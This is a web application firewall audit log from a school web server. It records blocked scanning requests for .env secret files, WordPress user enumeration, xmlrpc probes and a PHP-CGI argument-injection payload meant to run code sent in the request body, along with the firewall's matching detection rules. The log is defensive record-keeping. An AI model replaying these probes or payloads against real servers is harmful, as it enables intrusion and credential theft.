smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --9469217c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9469217c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800432414692 702 (- - -) Stopwatch2: 1745800432414692 702; combined=280, p1=247, p2=0, p3=0, p4=0, p5=33, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9469217c-Z-- --5193e92c-A-- [28/Apr/2025:07:33:52 +0700] aA7M8FT4soy9XydcuKajiAAAAEA 103.236.140.4 34468 103.236.140.4 8181 --5193e92c-B-- GET /shop/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --5193e92c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5193e92c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800432918571 837 (- - -) Stopwatch2: 1745800432918571 837; combined=320, p1=284, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5193e92c-Z-- --e0164e44-A-- [28/Apr/2025:07:45:13 +0700] aA7PmVT4soy9XydcuKaj_AAAAEY 103.236.140.4 37064 103.236.140.4 8181 --e0164e44-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.63 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0164e44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0164e44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745801113073222 3330 (- - -) Stopwatch2: 1745801113073222 3330; combined=1448, p1=451, p2=968, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0164e44-Z-- --7de5231e-A-- [28/Apr/2025:07:45:15 +0700] aA7Pm1T4soy9XydcuKaj_wAAAEg 103.236.140.4 37076 103.236.140.4 8181 --7de5231e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7de5231e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7de5231e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745801115466015 2958 (- - -) Stopwatch2: 1745801115466015 2958; combined=1356, p1=456, p2=871, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7de5231e-Z-- --9f49a403-A-- [28/Apr/2025:07:45:17 +0700] aA7PnVT4soy9XydcuKakAQAAAEk 103.236.140.4 37088 103.236.140.4 8181 --9f49a403-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.63 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9f49a403-C-- demo.sayHello --9f49a403-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f49a403-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745801117826386 6597 (- - -) Stopwatch2: 1745801117826386 6597; combined=4830, p1=577, p2=4044, p3=28, p4=31, p5=87, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f49a403-Z-- --340d815e-A-- [28/Apr/2025:07:45:33 +0700] aA7PrcJruAEpaSEZ7DC8tAAAABU 103.236.140.4 37156 103.236.140.4 8181 --340d815e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.63 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --340d815e-C-- demo.sayHello --340d815e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --340d815e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745801133126635 6676 (- - -) Stopwatch2: 1745801133126635 6676; combined=5056, p1=658, p2=4127, p3=36, p4=41, p5=112, sr=131, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --340d815e-Z-- --f4abac4a-A-- [28/Apr/2025:10:17:29 +0700] aA7zScJruAEpaSEZ7DDHVAAAABM 103.236.140.4 44288 103.236.140.4 8181 --f4abac4a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.196.84 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.196.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f4abac4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4abac4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745810249060376 814 (- - -) Stopwatch2: 1745810249060376 814; combined=360, p1=324, p2=0, p3=0, p4=0, p5=36, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4abac4a-Z-- --f0bae839-A-- [28/Apr/2025:10:53:44 +0700] aA77yGj1i6BJZll4jGO9IQAAAIY 103.236.140.4 52616 103.236.140.4 8181 --f0bae839-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --f0bae839-C-- --f0bae839-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0bae839-E-- --f0bae839-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745812424648518 5651 (- - -) Stopwatch2: 1745812424648518 5651; combined=3718, p1=548, p2=3138, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0bae839-Z-- --9c457652-A-- [28/Apr/2025:10:56:31 +0700] aA78b1T4soy9XydcuKavMAAAAEU 103.236.140.4 53292 103.236.140.4 8181 --9c457652-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 159.89.174.87 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 159.89.174.87 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --9c457652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c457652-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745812591686723 726 (- - -) Stopwatch2: 1745812591686723 726; combined=261, p1=230, p2=0, p3=0, p4=0, p5=30, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c457652-Z-- --6a605951-A-- [28/Apr/2025:11:21:03 +0700] aA8CL1T4soy9XydcuKawhAAAAEY 103.236.140.4 59024 103.236.140.4 8181 --6a605951-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.143.102 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.143.102 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --6a605951-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a605951-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745814063449962 962 (- - -) Stopwatch2: 1745814063449962 962; combined=390, p1=349, p2=0, p3=0, p4=0, p5=41, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a605951-Z-- --41bcee15-A-- [28/Apr/2025:13:23:45 +0700] aA8e8Wj1i6BJZll4jGPGKQAAAIY 103.236.140.4 60434 103.236.140.4 8181 --41bcee15-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --41bcee15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41bcee15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745821425646826 821 (- - -) Stopwatch2: 1745821425646826 821; combined=368, p1=328, p2=0, p3=0, p4=0, p5=40, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41bcee15-Z-- --f0e5c506-A-- [28/Apr/2025:13:36:08 +0700] aA8h2FT4soy9XydcuKa3qgAAAFM 103.236.140.4 35230 103.236.140.4 8181 --f0e5c506-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 142.93.143.8 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 142.93.143.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --f0e5c506-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0e5c506-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745822168140528 735 (- - -) Stopwatch2: 1745822168140528 735; combined=279, p1=247, p2=0, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0e5c506-Z-- --90d6e057-A-- [28/Apr/2025:15:40:43 +0700] aA8_C4_5LpLtj_OTfS_xcwAAAMQ 103.236.140.4 36554 103.236.140.4 8181 --90d6e057-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3724.8 Safari/537.36 Accept-Charset: utf-8 --90d6e057-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90d6e057-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745829643979384 778 (- - -) Stopwatch2: 1745829643979384 778; combined=317, p1=275, p2=0, p3=0, p4=0, p5=41, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90d6e057-Z-- --a8a8234c-A-- [28/Apr/2025:15:40:50 +0700] aA8_EsJruAEpaSEZ7DDdPQAAABE 103.236.140.4 36584 103.236.140.4 8181 --a8a8234c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 5.39.19.178 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 5.39.19.178 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a8a8234c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8a8234c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745829650489430 813 (- - -) Stopwatch2: 1745829650489430 813; combined=360, p1=301, p2=0, p3=0, p4=0, p5=58, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8a8234c-Z-- --cf375674-A-- [28/Apr/2025:15:41:09 +0700] aA8_JcJruAEpaSEZ7DDdRQAAAAA 103.236.140.4 36670 103.236.140.4 8181 --cf375674-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5S) Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --cf375674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf375674-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745829669869177 873 (- - -) Stopwatch2: 1745829669869177 873; combined=440, p1=403, p2=0, p3=0, p4=0, p5=37, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf375674-Z-- --eab4b833-A-- [28/Apr/2025:16:10:45 +0700] aA9GFVT4soy9XydcuKbADwAAAFE 103.236.140.4 43666 103.236.140.4 8181 --eab4b833-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.172.56.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.172.56.145 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --eab4b833-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eab4b833-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745831445444453 805 (- - -) Stopwatch2: 1745831445444453 805; combined=347, p1=309, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eab4b833-Z-- --6cfa261a-A-- [28/Apr/2025:16:22:08 +0700] aA9IwFT4soy9XydcuKbAmQAAAEw 103.236.140.4 46298 103.236.140.4 8181 --6cfa261a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; STK-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --6cfa261a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cfa261a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745832128019322 834 (- - -) Stopwatch2: 1745832128019322 834; combined=365, p1=327, p2=0, p3=0, p4=0, p5=38, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cfa261a-Z-- --82316c14-A-- [28/Apr/2025:16:22:10 +0700] aA9Iwmj1i6BJZll4jGPQDgAAAIM 103.236.140.4 46308 103.236.140.4 8181 --82316c14-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3889.0 Safari/537.36 Accept-Charset: utf-8 --82316c14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82316c14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745832130107629 926 (- - -) Stopwatch2: 1745832130107629 926; combined=446, p1=391, p2=0, p3=0, p4=0, p5=55, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82316c14-Z-- --c8012a63-A-- [28/Apr/2025:17:20:35 +0700] aA9Wc8JruAEpaSEZ7DDlWwAAAAg 103.236.140.4 42770 103.236.140.4 8181 --c8012a63-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.226.65.160 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.226.65.160 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c8012a63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8012a63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745835635108654 847 (- - -) Stopwatch2: 1745835635108654 847; combined=350, p1=317, p2=0, p3=0, p4=0, p5=33, sr=120, 